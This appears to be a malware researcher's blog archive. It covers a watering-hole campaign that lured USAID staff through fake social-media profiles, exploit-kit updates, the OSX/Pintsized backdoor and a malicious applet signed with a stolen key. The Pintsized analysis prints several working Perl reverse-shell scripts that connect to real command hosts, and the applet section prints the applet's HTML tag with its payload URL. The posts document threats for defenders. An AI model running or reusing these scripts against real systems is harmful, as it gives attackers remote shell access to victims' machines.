Category Archives: Various

DOL Watering Hole Campaign and Sexy Swedish Soccer Supporter

As I explained in my previous blog post, nine websites were involved in the DOL watering hole campaign. The first involved website was University Research Co. Cambodia (www[.]urccambodia[.]org) from 2013-03-15 to 2013-04-29. This website came out of the context of other websites used in this watering hole campaign.

The Better Health Services (BHS) is a USAID-funded health systems strengthening project in Cambodia that began in January 2009 and runs through December 2013. The BHS project’s goals dovetail with the mission of the Ministry of Health as stated in the Cambodian Health Strategic Plan 2008-2015 (HSP2) “to provide stewardship for the entire health sector and to ensure a supportive environment for increased demand and equitable access to quality health services in order that all the peoples of Cambodia are able to achieve the highest level of health and well-being.”

By continuing my researches on the gathered information’s found on dol[.]ns01[.]us backend and focusing on all information’s related to University Research Co. Cambodia website, I found some interesting behaviours.

In all the gathered information’s I firstly found a connection referer to www[.]urccambodia[.]org, this referer was a shortened URL http://t[.]co/RnWc0Z13Sc. Doing a google research on this shortened URL we can find a tweet from @natividad_usaid, dating from 2013-03-18.

natividad_usaid-1

If you observe @natividad_usaid, you will see that the account activity has begun the March 18th and finished the April 10th. Mostly all of the tweet have provide link to www[.]urccambodia[.]org, during the time of this website infection. Some twitter users were directly contacted in order to incite them to click to the link and most of these users were related to USAID (US Agency for International Development).

natividad_usaid-2

 

natividad_usaid-5

natividad_usaid-4

But most interesting is the profile description of this account and especially the shortened URL goo[.]gl/kpb7r how lead to “this is my pic.scr” file hosted on Dropbox. By analyzing this file it appear that it is Poison Ivy (504a32e123194a298018129404a1374e).

natividad_usaid-profile

dropbox-poisonivy

A malwr analysis of this sample reveal that “microsoftUpdate[.]ns1[.]name” is the contacted C&C server and that “conime.exe” file is also created. This C&C server is the same as mentioned by Crowdstrike, AlienVault and other security researchers or vendors, but from “bookmark.png” payload involved in Internet Explorer 8 0day (CVE-2013-1347).

It seem that this twitter account was only created and used to incite USAID twitter users to be infected through a www[.]urccambodia[.]org visit.

By continuing to analyze www[.]urccambodia[.]org related gathered information’s, I found a second connection referer to www[.]urccambodia[.]org. This referer is the Facebook profile of Kelly Black “http://www.facebook.com/kelly.black.92754“.

This sexy lady, posing with a friend, pretend to have work for USAID, to have study at UVA College of Arts & Sciences Alumni, to live in Washington, District of Columbia and to be from Springfield, Illinois.

kelly-black-facebook-1

Kelly Black account activity has start and stopped the same day, the March 24th. Most of the posts of this “lady” are link to infected www[.]urccambodia[.]org website and/or to project around sanitation of Mekong waters organized by US organization’s.

kelly-black-facebook-2

kelly-black-facebook-3

kelly-black-facebook-4

kelly-black-facebook-5kelly-black-facebook-5

This sexy lady has, in one day of activity, 41 friends and most of these friends are from USAID or from others organization’s.

Now the funny part of the story, on the picture you can see two beautiful women with a yellow T-shirt and they seem to enjoy the live. One of the friends of Kelly Black was interesting to know which of the two she was, and the “bad guys” toke the time to respond to him 🙂

kelly-black-facebook-6

But I was intrigued by this picture and decided to compare this one on Internet, and ho miracle these ladies are not US women from Springfield, Illinois, but Swedish supporters who were photographed during European soccer cup in Poland/Ukraine.

You can find this photo through TinEye or Google pictures comparison services. This photo is present on different medias, ActionPlus, DailyMail and bunch of other websites.

Gong Da Exploit Kit Add Java CVE-2013-1493 & IE CVE-2012-4792 & IE CVE-2012-4969 Support

Like other Exploit Kits, Gong Da has add support for Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, has also add support for Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in an emergency patch in September 2012 and January 2013.

Here is the new code for CVE-2013-1493.

Capture d’écran 2013-04-14 à 23.39.38

And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).

Capture d’écran 2013-04-14 à 23.39.48

Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.

Capture d’écran 2013-04-14 à 23.40.15

As always this new version of Gong Da Exploit Kit has been discovered on a Korean web site.

Gong Da Pack has involve to the following diagram.

Gong Da EK 1.5

Here under some information s regarding the different files:

Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on ThreatExpert)

OSX/Pintsized Backdoor Additional Details

In complement to my blog post regarding Facebook, Twitter and Apple victims of a watering hole attacks, you will find here under some additional informations regarding OSX/Pintsized, the backdoor used to in these attacks.

OSX/Pintsized backdoor was initially described by Intego, the 19 February, with some details. At the time of Intego post, all of the C&C components were sinkholed to Shadowserver. The backdoor was composed of clear text reverse shell perl scripts, executed a regular interval, and by a forked version of OpenSSH named “cupsd“. A RSA key was embedded in the forked OpenSSH, reported domain name of C&C was “corp-aapl.com” and reported file names were:

  • com.apple.cocoa.plist
  • cupsd (Mach-O binary)
  • com.apple.cupsd.plist
  • com.apple.cups.plist
  • com.apple.env.plist

F-Secure also reported, the 19 February, some additional C&C servers “cloudbox-storage.com” and “digitalinsight-ltd.com“. Symantec reported some additional details on the C&C domain names “cache.cloudbox-storage.com“, “img.digitalinsight-ltd.com” and “pop.digitalinsight-ltd.com“, and also reported the storage location of the forked version of OpenSSH “/Users/[USER NAME]/.cups/cupsd“.

By doing an analysis of OSX/Pintsized I can provide the following additional informations:

All files, targeting OSX, were controlled by launchd daemon through launchd.plist configuration files. Here under the list of all known launchd configuration files.

7fe4149b82516ae43938de6b8316ed84

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

2e35b9a683ccc2408fef5ca575abf0e6

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

27f241c64303e4e2d1d94d3143a48eb9

First seen: 2013-02-19 / Label: com.apple.istore / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;
$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
2b9b84f0612d6f9d7efb705dd7522f83

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;

<em id="__mceDel">$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
34cee92669e0c60a9dbafae7319f49db

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
d3f151b246deb74890c612606c6ad044

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$h="pop.digitalinsight-ltd.com ";
$h=~s/\s+$//;
$p=sockaddr_in(443 ,inet_aton($h));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

f419dfb35a0d220c4c53c4a087c91d5e

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("pop.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

59424d4a567ae809f96afc56d22892b2

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 999 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

Here under all binary files, aka “/Users/[USER NAME]/.cups/cupsd” or “/usr/sbin/muxd“.

0ec55685affc322a5d7be2e9ca1f9cbf

First seen: 2013-01-31 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

3a861b8526e397b3684a99f363ec145b

First seen: 2013-02-20 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0p1 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

Here under an additional binary caught when Microsoft also pointed the fact that they were victim of this campaign.

1582d68144de2808b518934f0a02bfd6

First seen: 2013-01-22 / Internal name: javacpl.exe

One additional file who was reported linked to the campaign:

622fc8b7daf425aed7f9ffa97e30c611

First seen: 2013-01-04 / Type: Java serialized data

If you take a look at all the domain names sinkholed to Shadowserver, you will see additional domain names.

img

Domain name: corp-appl.com – Creation Date: 05-mar-2012

Domain name: cloudbox-storage.com – Creation Date: 07-dec-2012 – Sub-domains: cache.cloudbox-storage.com

Domain name: digitalinsight-ltd.com – Creation Date: 22-mar-2012 – Sub-domains: ads.digitalinsight-ltd.com, img.digitalinsight-ltd.com, www.digitalinsight-ltd.com and pop.digitalinsight-ltd.com

Domain name: clust12-akmai.net – Creation Date: 06-jun-2012 – Sub-domains:  fb.clust12-akmai.net and fbu.clust12-akmai.net

Domain name: jdk-update.com – Creation Date: 31-oct-2012 – Sub-domains:  ww1.jdk-update.com and www.jdk-update.com

Domain name: fbcbn.net – Creation Date: 09-oct-2012 – Sub-domains:  ak.fbcbn.net and static.ak.fbcbn.net

When a Signed Java JAR file is not Proof of Trust

Today, Malware Domain List, reported strange behaviours regarding a Java app executed with the latest version of Java 6.

As you can observe, VirusTotal didn’t find something wrong (0/46) regarding the Java app, but after few hours, some analysis and some discussions on Twitter, it appear that this file is a malicious file (3/46) dropping malwares and that Oracle still need to enhance the security level of Java.

This “innocent” Java app was found on “hxxp://dict.tu-chemnitz.de/“, a german online dictionary infected by g01pack Exploit Kit.

Call to the Java app was done through:

</pre></pre>
<applet name="Java™ <span class=">ClearWeb Security Update" code="app.applet.class" archive="http://oracle.com.java.security.jre8.update.win32.release.for.datrynto.dynalias.com/css/pkcw.mp3"></applet>
<pre>
<pre>
<param name="pert" value="36820"><param name="conchs" value="y"><param name="rss" value="rbE1I7EWurI7bh#b=uNWdJN==Jm7cmu6:6qI4Rwtx24cAxiWI=4=3%=x34cQeQQemZx">
</applet>

As you can see, the Java app try to make the end-user believe that this is a “ClearWeb Security Update” with a URL also trying to imitate a pseudo like Oracle Java JRE8 (lol) update.

java-signed-applet1

Also you can see that the publisher is “CLEARESULT CONSULTING INC.“, a real firm located in Texas USA. It also seem that this applet is a “trusted” signed applet. If the applet were signed by an “non-trusted” or “self-signed” certificate the dialog box would have been like the following one.

warning-supermario-3d-nintendo

If you click on the “More Information” link of the dialog box, you will have another messages confirming you that you can trust this Java applet (The digital signature was generated with a trusted certificate).

java-signed-applet2

And by clicking on “Certificate Details“, you will have associated information’s.

java-signed-applet3

You maybe remember that Oracle has introduce “Security Levels” since Java SE 7 Update 10 in December 2012. Five levels of security are supported, plus a custom security level settings. This feature can be set in the Java Control Panel or (on Microsoft Windows platform only) using a command-line install argument.

The five levels are:

  • Custom: You can customize all the security settings based on you’re needs.
  • Low: Most unsigned Java apps in the browser will run without prompting unless they request access to a specific old version or to protected resources on the system.
  • Medium: Unsigned Java apps in the browser will run without prompting only if the Java version is considered secure. You will be prompted if an unsigned app requests to run on an old version of Java.
  • High: Default Security Level. You will be prompted before any unsigned Java app runs in the browser.
  • Very High: You will be prompted before any Java app runs in the browser. If your version of Java is insecure, unsigned apps will not run.

As you can see only unsigned Java app are considered as non-secure, and signed Java app are blocked only with the “Very High” security level. So with the default security level, aka “High” a signed Java app is executed additional advises.

If you read Oracle documentation “Understanding Signing and Verification“, you will find nice definitions, like:

You digitally sign a file for the same reason you might sign a paper document with pen and ink — to let readers know that you wrote the document, or at least that the document has your approval. When you sign a letter, for example, everyone who recognizes your signature can confirm that you wrote the letter. Similarly when you digitally sign a file, anyone who “recognizes” your digital signature knows that the file came from you. The process of “recognizing” electronic signatures is called verification.

or

 The ability to sign and verify files is an important part of the Java platform’s security architecture. Security is controlled by the security policy that’s in force at runtime. You can configure the policy to grant security privileges to applets and to applications. For example, you could grant permission to an applet to perform normally forbidden operations such as reading and writing local files or running local executable programs. If you have downloaded some code that’s signed by a trusted entity, you can use that fact as a criterion in deciding which security permissions to assign to the code.

So you have understood, if a Java app is signed with your name, it is the proof that you have sign this Java app, and this Java app will run on your system with special privileges… But, but, if somebody has steal your private key that allow you to sign you’re Java app, can the users still trust the Java app ?

The Java app discovered by Malware Domain List was signed with a stollen private key… Worst, the certificate associated to the applet was revoked by GoDaddy the Dec 7 17:46:22 2012 GMT (thanks to @Jindroush). But signing and verifying files is so an important part of the Java platform’s security architecture that Jarsigner validates the file despite the certificate is revoked since a while…

The cause to this nightmare are very simple and I agree with Jindroush #WTF #Java !

By default, certificate revocation list check is set to “OFF” and signed Java app are authorized to have privileged accesses…

So conclusion, signed Java app are not a proof of trust if you don’t check revocation lists ….